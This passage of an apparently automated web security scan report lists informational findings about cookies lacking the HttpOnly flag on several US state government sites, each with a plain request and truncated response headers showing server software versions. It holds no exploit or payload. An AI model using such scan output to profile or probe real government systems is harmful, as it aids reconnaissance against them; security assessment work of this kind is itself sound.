Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=302A2BC072C910721079FD47DEDA6F26

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:38:26 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=8B164DF672CA107204E7B0604E433874; Path=/; Domain=.nrsservicecenter.com
Content-Length: 332
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr />
...[SNIP]...

14.616. http://www.nv.gov/NV_default4.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /NV_default4.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NV_default4.aspx?id=345 HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=5ddcfda7-21c6-4f17-acf6-3568d114748f; expires=Mon, 30-Apr-2012 11:24:28 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 11:24:28 GMT; path=/
Set-Cookie: ASP.NET_SessionId=mzbc3255iwftyx2sfkbnli45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:29 GMT
Content-Length: 23621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

14.617. http://www.nv.gov/WorkArea/DmsMenu/DmsMenu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /WorkArea/DmsMenu/DmsMenu.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WorkArea/DmsMenu/DmsMenu.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nv.gov

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 30382
Content-Type: text/javascript
Last-Modified: Mon, 07 Dec 2009 19:06:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=70d166af-ca4d-4346-8ab2-2ba041fdf173; expires=Mon, 30-Apr-2012 11:25:12 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 11:25:12 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:25:12 GMT

if("undefined" === typeof Ektron)
{
var Ektron = window.Ektron = {};
}

if ("undefined" === typeof Ektron.DMSMenu)
{
Ektron.DMSMenu =
{
/* Properties
------------
...[SNIP]...

14.618. http://www.nv.gov/WorkArea/java/ektron.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /WorkArea/java/ektron.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WorkArea/java/ektron.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nv.gov

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 172238
Content-Type: text/javascript
Last-Modified: Wed, 25 Nov 2009 16:17:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=a1b7243a-e5c6-4b1e-9baf-9813f4f652b7; expires=Mon, 30-Apr-2012 11:25:09 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 11:25:09 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:25:09 GMT

if ("undefined" == typeof $ektron)
{
/*
Ektron JavaScript Library
Copyright (c) 2008 Ektron, Inc.
All rights reserved

Instructions to upgrade this Ektron Li
...[SNIP]...

14.619. http://www.nv.gov/WorkArea/java/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /WorkArea/java/thickbox.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WorkArea/java/thickbox.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nv.gov

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 20695
Content-Type: text/javascript
Last-Modified: Thu, 29 Oct 2009 21:36:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=694047a8-96eb-4ab3-848e-bf00cea8dc2a; expires=Mon, 30-Apr-2012 11:25:11 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 11:25:11 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:25:10 GMT

/* the following variables are included for backwards compatibility
with the current Ektron Library
*/
var ektjq = $ektron;
var ektj$ = $ektron;

/*
* Thickbox 3.1 - One Box To Rule Them A
...[SNIP]...

14.620. http://www.nv.gov/workarea/java/ektronJs.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /workarea/java/ektronJs.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nv.gov

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: application/javascript; charset=utf-8
Expires: Sun, 29 Apr 2012 11:25:15 GMT
Last-Modified: Sat, 30 Apr 2011 11:25:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=4970d4b8-bf7b-42ab-a513-003651f753e5; expires=Mon, 30-Apr-2012 11:25:15 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 11:25:15 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:25:15 GMT
Content-Length: 18918

var m_EkTbTimeout_AjaxToolBar=null;var m_EkTbAutomaticOutsideBorder_AjaxToolBar=true;var m_EkTbOutsideBorder_AjaxToolBar=true;var m_EkTbMenuOffDelay_AjaxToolBar=500;var m_EkTbMenuBorderWidth_AjaxToolB
...[SNIP]...

14.621. https://www.ri.gov/Licensing/renewal/license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ri.gov
Path:   /Licensing/renewal/license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Licensing/renewal/license.php HTTP/1.1
Host: www.ri.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=53040939.1304117314.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53040939.341417921.1304117314.1304117314.1304117314.1; font_level=0; __utmc=53040939; __utmb=53040939.3.10.1304117314; switchable_style=normal;

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:40:06 GMT
Server: www
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 30 Apr 2011 12:40:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=ohu9uko90gmil46imdcoddrbm5; path=/
Location: /Licensing/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=iso-8859-1


14.622. http://www.sc.gov/PublishingImages/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sc.gov
Path:   /PublishingImages/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PublishingImages/favicon.ico HTTP/1.1
Host: www.sc.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; __utmb=46765221.1.10.1304123778

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Length: 343
Content-Type: image/x-icon
Last-Modified: Wed, 27 Jan 2010 17:35:30 GMT
ETag: "{BC0A918C-3290-459A-8CDB-C244059B37DB},2"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
ResourceTag: rt:BC0A918C-3290-459A-8CDB-C244059B37DB@00000000002
Exires: Fri, 15 Apr 2011 00:36:31 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
Date: Sat, 30 Apr 2011 00:36:31 GMT
Set-Cookie: BIGipServerAgencySite=855793418.20480.0000; path=/

GIF89a.......i.H..............{........r...|.\.......................u...........f...t.U....................y.............a............................................................................
...[SNIP]...

14.623. https://www.scsignon.sc.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?CallbackUrl=https://www3.sctax.org/eSales/procLogon.asp&ApplicationSId=ESales HTTP/1.1
Host: www.scsignon.sc.gov
Connection: keep-alive
Referer: https://www3.sctax.org/esales/startReg.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; __utmb=46765221.2.10.1304123778

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Set-Cookie: ASP.NET_SessionId=ebd1ut55m4lu1x55fpv0xleo; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 01:06:55 GMT
Set-Cookie: TS958e6e=4cd4ad94e98f7572917d9abce2c0b8bffe6de3a44c3e21294dbb60b0; Path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 15349


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>DOR eSales Login</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

...[SNIP]...

14.624. https://www.scsignon.sc.gov/Common/HelpWindow.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Common/HelpWindow.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Common/HelpWindow.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:07 GMT
Connection: close
Set-Cookie: TS958e6e=dfdcf9946f9839514d16f4e3c29e87328f3c5cdacd73a69a4dbc0328; Path=/
Vary: Accept-Encoding
Content-Length: 32551


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Welcome to the South Carolina Business One Stop
       </title>
       <meta http-equiv="Con
...[SNIP]...

14.625. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Eng/Secured/Security/ForgotPassword.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Eng/Secured/Security/ForgotPassword.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:11 GMT
Connection: close
Content-Length: 35565
Set-Cookie: TS958e6e=03bbad503533905e4d507c70b83d12198f3c5cdacd73a69a4dbc032c; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS Forgot Password - Enter User
Name
       </title>
       <meta http-equiv="Content-Type" con
...[SNIP]...

14.626. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Eng/Secured/Security/ForgotUserName.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Eng/Secured/Security/ForgotUserName.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:14 GMT
Connection: close
Content-Length: 35777
Set-Cookie: TS958e6e=aed2e7cc2d346bc41b1ac340bfeac58f8f3c5cdacd73a69a4dbc032e; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Forgot
User Name
       </title>
       <meta http-equiv="Content-Type" content="text/html
...[SNIP]...

14.627. https://www.scsignon.sc.gov/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:13 GMT
Connection: close
Content-Length: 38680
Set-Cookie: TS958e6e=aed2e7cc2d346bc41b1ac340bfeac58f8f3c5cdacd73a69a4dbc032e; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           Login
       </title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       
...[SNIP]...

14.628. https://www.scsignon.sc.gov/SCBOS.Core.DynamicFormsGlobal.Resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.DynamicFormsGlobal.Resources.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SCBOS.Core.DynamicFormsGlobal.Resources.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:15 GMT
Connection: close
Content-Length: 0
Set-Cookie: TS958e6e=ea57241c9d8bd2dfd124d91fd42af58a8f3c5cdacd73a69a4dbc0330; Path=/


14.629. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Imaging.Resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.Framework.Imaging.Resources.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SCBOS.Core.Framework.Imaging.Resources.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: private
Expires: Wed, 04 May 2011 12:40:18 GMT
Last-Modified: Sat, 30 Apr 2011 12:40:18 GMT
Accept-Ranges: bytes
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:18 GMT
Connection: close
Content-Length: 0
Set-Cookie: TS958e6e=003288ad0d54e7fe802efdbf53043c4b8f3c5cdacd73a69a4dbc0332; Path=/


14.630. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.Controls.Resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.Framework.Web.Controls.Resources.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SCBOS.Core.Framework.Web.Controls.Resources.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:17 GMT
Connection: close
Content-Length: 0
Set-Cookie: TS958e6e=e2083b6514de1f591e4b161aac9d05358f3c5cdacd73a69a4dbc0333; Path=/


14.631. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.Framework.Web.UI.Resources.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SCBOS.Core.Framework.Web.UI.Resources.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:19 GMT
Connection: close
Content-Length: 0
Set-Cookie: TS958e6e=eacd5b74d8dff056de0edce1c2f313e28f3c5cdacd73a69a4dbc0334; Path=/


14.632. https://www.scsignon.sc.gov/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:20 GMT
Connection: close
Set-Cookie: TS958e6e=274ee5e0c50b7433045d42ee8c81d6e48f3c5cdacd73a69a4dbc0335; Path=/
Vary: Accept-Encoding
Content-Length: 32144


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Welcome to the South Carolina Business One Stop
       </title>
       <meta http-equiv="Con
...[SNIP]...

